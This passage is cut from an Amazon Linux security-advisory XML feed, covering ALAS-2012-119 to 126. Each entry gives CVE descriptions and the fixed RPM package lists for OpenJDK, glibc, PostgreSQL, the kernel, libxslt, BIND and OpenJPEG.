arch="x86_64"><filename>Packages/kernel-headers-3.2.28-45.62.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.28" release="45.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.28-45.62.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.28" release="45.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.28-45.62.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.28" release="45.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.28-45.62.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-119</id><title>Amazon Linux - ALAS-2012-119: important priority package update for java-1.6.0-openjdk</title><issued date="2012-09-04 10:22:00" /><updated date="2014-09-14 16:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1682:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 6 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Beans, a different vulnerability than CVE-2012-3136. NOTE: Oracle has not commented on claims from a downstream vendor that this issue is related to "XMLDecoder security issue via ClassFinder."
It was discovered that the Beans component in OpenJDK did not perform permission checks properly. An untrusted Java application or applet could use this flaw to use classes from restricted packages, allowing it to bypass Java sandbox restrictions.
853097:
CVE-2012-1682 OpenJDK: beans ClassFinder insufficient permission checks (beans, 7162476)
CVE-2012-0547:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 6 and earlier, and 6 Update 34 and earlier, has no impact and remote attack vectors involving AWT and "a security-in-depth issue that is not directly exploitable but which can be used to aggravate security vulnerabilities that can be directly exploited." NOTE: this identifier was assigned by the Oracle CNA, but CVE is not intended to cover defense-in-depth issues that are only exposed by the presence of other vulnerabilities. NOTE: Oracle has not commented on claims from a downstream vendor that this issue is related to "toolkit internals references."
This update fixes several vulnerabilities in the Oracle Java Runtime Environment and the Oracle Java Software Development Kit. Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory and Oracle Security Alert pages, listed in the References section.
This update fixes several vulnerabilities in the IBM Java Runtime Environment and the IBM Java Software Development Kit. Detailed vulnerability descriptions are linked from the IBM Security alerts page, listed in the References section.
A hardening fix was applied to the AWT component in OpenJDK, removing functionality from the restricted SunToolkit class that was used in combination with other flaws to bypass Java sandbox restrictions.
853228:
CVE-2012-0547 OpenJDK: AWT hardening fixes (AWT, 7163201)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0547" title="" id="CVE-2012-0547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1682" title="" id="CVE-2012-1682" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1221.html" title="" id="RHSA-2012:1221" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.11.4.46.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.11.4.46.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.11.4.46.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.11.4.46.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.11.4.46.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.11.4.46.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.11.4.46.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.11.4.46.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.11.4.46.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.11.4.46.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.11.4.46.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.11.4.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.11.4.46.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-120</id><title>Amazon Linux - ALAS-2012-120: medium priority package update for glibc</title><issued date="2012-09-04 10:23:00" /><updated date="2014-09-14 16:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3480:
Multiple integer overflows in the (1) strtod, (2) strtof, (3) strtold, (4) strtod_l, and other unspecified "related functions" in stdlib in GNU C Library (aka glibc or libc6) 2.16 allow local users to cause a denial of service (application crash) and possibly execute arbitrary code via a long string, which triggers a stack-based buffer overflow.
Multiple integer overflow flaws, leading to stack-based buffer overflows, were found in glibc's functions for converting a string to a numeric representation (strtod(), strtof(), and strtold()). If an application used such a function on attacker controlled input, it could cause the application to crash or, potentially, execute arbitrary code.
847715:
CVE-2012-3480 glibc: Integer overflows, leading to stack-based buffer overflows in strto* related routines
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3480" title="" id="CVE-2012-3480" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1208.html" title="" id="RHSA-2012:1208" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="glibc-static" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="nscd" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.12-1.80.42.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-121</id><title>Amazon Linux - ALAS-2012-121: medium priority package update for postgresql9</title><issued date="2012-09-04 10:23:00" /><updated date="2014-09-14 16:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3488:
It was found that the optional PostgreSQL xml2 contrib module allowed local files and remote URLs to be read and written to with the privileges of the database server when parsing Extensible Stylesheet Language Transformations (XSLT). An unprivileged database user could use this flaw to read and write to local files (such as the database's configuration files) and remote URLs they would otherwise not have access to by issuing a specially-crafted SQL query.
849172:
CVE-2012-3488 postgresql (xml2 contrib module): XXE by applying XSL stylesheet to the document
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3488" title="" id="CVE-2012-3488" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="postgresql9-devel" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-devel-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-docs" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-docs-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-test" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-test-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-pltcl" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-pltcl-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-debuginfo" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-debuginfo-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-plperl" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plperl-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-plpython" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plpython-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-contrib" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-contrib-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-server" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-server-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-libs" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-libs-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-devel" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-devel-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-server" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-server-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-plperl" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-plperl-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-pltcl" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-pltcl-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-libs" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-libs-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-docs" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-docs-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-test" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-test-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-debuginfo" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-debuginfo-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-contrib" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-contrib-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-plpython" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-plpython-9.1.5-1.23.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-122</id><title>Amazon Linux - ALAS-2012-122: medium priority package update for kernel</title><issued date="2012-09-10 17:56:00" /><updated date="2014-09-14 16:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3520:
850449:
CVE-2012-3520 kernel: af_netlink: invalid handling of SCM_CREDENTIALS passing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3520" title="" id="CVE-2012-3520" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.28" release="45.63.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.28-45.63.amzn1.noarch.rpm</filename></package><package name="kernel" version="3.2.28" release="45.63.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.28-45.63.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.28" release="45.63.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.28-45.63.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.28" release="45.63.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.28-45.63.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.28" release="45.63.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.28-45.63.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.28" release="45.63.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.28-45.63.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.28" release="45.63.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.28-45.63.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.28" release="45.63.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.28-45.63.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.28" release="45.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.28-45.63.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.28" release="45.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.28-45.63.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.28" release="45.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.28-45.63.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.28" release="45.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.28-45.63.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.28" release="45.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.28-45.63.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.28" release="45.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.28-45.63.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.28" release="45.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.28-45.63.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-123</id><title>Amazon Linux - ALAS-2012-123: important priority package update for libxslt</title><issued date="2012-09-22 21:33:00" /><updated date="2014-09-14 17:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2871:
libxml2 2.9.0-rc1 and earlier, as used in Google Chrome before 21.0.1180.89, does not properly support a cast of an unspecified variable during handling of XSL transforms, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted document, related to the _xmlNs data structure in include/libxml/tree.h.
A heap-based buffer overflow flaw was found in the way libxslt applied templates to nodes selected by certain namespaces. An attacker could use this flaw to create a malicious XSL file that, when used by an application linked against libxslt to perform an XSL transformation, could cause the application to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
852935:
CVE-2012-2871 libxslt: Heap-buffer overflow caused by bad cast in XSL transforms
CVE-2012-2870:
libxslt 1.1.26 and earlier, as used in Google Chrome before 21.0.1180.89, does not properly manage memory, which might allow remote attackers to cause a denial of service (application crash) via a crafted XSLT expression that is not properly identified during XPath navigation, related to (1) the xsltCompileLocationPathPattern function in libxslt/pattern.c and (2) the xsltGenerateIdFunction function in libxslt/functions.c.
Several denial of service flaws were found in libxslt. An attacker could use these flaws to create a malicious XSL file that, when used by an application linked against libxslt to perform an XSL transformation, could cause the application to crash.
852937:
CVE-2012-2870 libxslt: Use-after-free when processing an invalid XPath expression
CVE-2012-2825:
The XSL implementation in Google Chrome before 20.0.1132.43 allows remote attackers to cause a denial of service (incorrect read operation) via unspecified vectors.
Several denial of service flaws were found in libxslt. An attacker could use these flaws to create a malicious XSL file that, when used by an application linked against libxslt to perform an XSL transformation, could cause the application to crash.
835982:
CVE-2012-2825 libxslt: DoS when reading unexpected DTD nodes in XSLT
CVE-2011-3970:
libxslt, as used in Google Chrome before 17.0.963.46, allows remote attackers to cause a denial of service (out-of-bounds read) via unspecified vectors.
Several denial of service flaws were found in libxslt. An attacker could use these flaws to create a malicious XSL file that, when used by an application linked against libxslt to perform an XSL transformation, could cause the application to crash.
788826:
CVE-2011-3970 libxslt: Out-of-bounds read when parsing certain patterns
CVE-2011-1202:
The xsltGenerateIdFunction function in functions.c in libxslt 1.1.26 and earlier, as used in Google Chrome before 10.0.648.127 and other products, allows remote attackers to obtain potentially sensitive information about heap memory addresses via an XML document containing a call to the XSLT generate-id XPath function.
An information leak could occur if an application using libxslt processed an untrusted XPath expression, or used a malicious XSL file to perform an XSL transformation. If combined with other flaws, this leak could possibly help an attacker bypass intended memory corruption protections.
A flaw was found in the Firefox XSLT generate-id() function. This function returned the memory address of an object in memory, which could possibly be used by attackers to bypass address randomization protections.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1202" title="" id="CVE-2011-1202" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3970" title="" id="CVE-2011-3970" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2825" title="" id="CVE-2012-2825" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2870" title="" id="CVE-2012-2870" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2871" title="" id="CVE-2012-2871" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1265.html" title="" id="RHSA-2012:1265" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libxslt-python" version="1.1.26" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-python-1.1.26-2.7.amzn1.i686.rpm</filename></package><package name="libxslt" version="1.1.26" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-1.1.26-2.7.amzn1.i686.rpm</filename></package><package name="libxslt-devel" version="1.1.26" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-devel-1.1.26-2.7.amzn1.i686.rpm</filename></package><package name="libxslt-debuginfo" version="1.1.26" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-debuginfo-1.1.26-2.7.amzn1.i686.rpm</filename></package><package name="libxslt-devel" version="1.1.26" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-devel-1.1.26-2.7.amzn1.x86_64.rpm</filename></package><package name="libxslt-debuginfo" version="1.1.26" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-debuginfo-1.1.26-2.7.amzn1.x86_64.rpm</filename></package><package name="libxslt-python" version="1.1.26" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-python-1.1.26-2.7.amzn1.x86_64.rpm</filename></package><package name="libxslt" version="1.1.26" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-1.1.26-2.7.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-124</id><title>Amazon Linux - ALAS-2012-124: important priority package update for bind</title><issued date="2012-09-22 21:34:00" /><updated date="2014-09-14 16:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-4244:
ISC BIND 9.x before 9.7.6-P3, 9.8.x before 9.8.3-P3, 9.9.x before 9.9.1-P3, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P3 allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a long resource record.
A flaw was found in the way BIND handled resource records with a large RDATA value. A malicious owner of a DNS domain could use this flaw to create specially-crafted DNS resource records, that would cause a recursive resolver or secondary server to exit unexpectedly with an assertion failure.
856754:
CVE-2012-4244 bind: specially crafted resource record causes named to exit
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4244" title="" id="CVE-2012-4244" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1268.html" title="" id="RHSA-2012:1268" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="bind" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.10.rc1.24.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.10.rc1.24.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.24.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.24.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.10.rc1.24.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.24.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.10.rc1.24.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.10.rc1.24.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.10.rc1.24.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.24.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.24.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.24.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.10.rc1.24.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.10.rc1.24.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-125</id><title>Amazon Linux - ALAS-2012-125: important priority package update for openjpeg</title><issued date="2012-09-22 21:35:00" /><updated date="2014-09-14 16:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3535:
It was found that OpenJPEG failed to sanity-check an image header field before using it. A remote attacker could provide a specially-crafted image file that could cause an application linked against OpenJPEG to crash or, possibly, execute arbitrary code.
Heap-based buffer overflow in OpenJPEG 1.5.0 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted JPEG2000 file.
842918:
CVE-2012-3535 openjpeg: heap-based buffer overflow when decoding jpeg2000 files
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3535" title="" id="CVE-2012-3535" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1283.html" title="" id="RHSA-2012:1283" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openjpeg-devel" version="1.3" release="9.6.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-devel-1.3-9.6.amzn1.i686.rpm</filename></package><package name="openjpeg" version="1.3" release="9.6.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-1.3-9.6.amzn1.i686.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="9.6.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-debuginfo-1.3-9.6.amzn1.i686.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="9.6.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-libs-1.3-9.6.amzn1.i686.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="9.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-libs-1.3-9.6.amzn1.x86_64.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="9.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-debuginfo-1.3-9.6.amzn1.x86_64.rpm</filename></package><package name="openjpeg" version="1.3" release="9.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-1.3-9.6.amzn1.x86_64.rpm</filename></package><package name="openjpeg-devel" version="1.3" release="9.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-devel-1.3-9.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-126</id><title>Amazon Linux - ALAS-2012-126: medium priority package update for libexif</title><issued date="2012-09-22 